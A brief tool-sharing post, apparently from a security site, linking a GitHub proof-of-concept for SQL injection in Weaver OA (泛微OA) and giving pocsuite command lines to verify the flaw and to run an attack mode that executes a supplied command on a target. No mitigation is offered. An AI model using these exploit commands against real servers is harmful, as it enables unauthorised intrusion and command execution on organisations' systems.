SQL injection vulnerability in a certain version of Weaver OA (泛微OA)

Author: Sec-Labs | Published:

Project URL

https://github.com/Wrin9/weaverOA_sql_injection

Introduction

POC (note: the URL must not end with [/]; for example, use http://127.0.0.1:8080, not http://127.0.0.1:8080/):

pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --verify


EXP: pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --attack --command "[command]"

Note: the URL must not end with [/]; for example, use http://127.0.0.1:8080, not http://127.0.0.1:8080/


Tags: tool sharing, Weaver OA vulnerability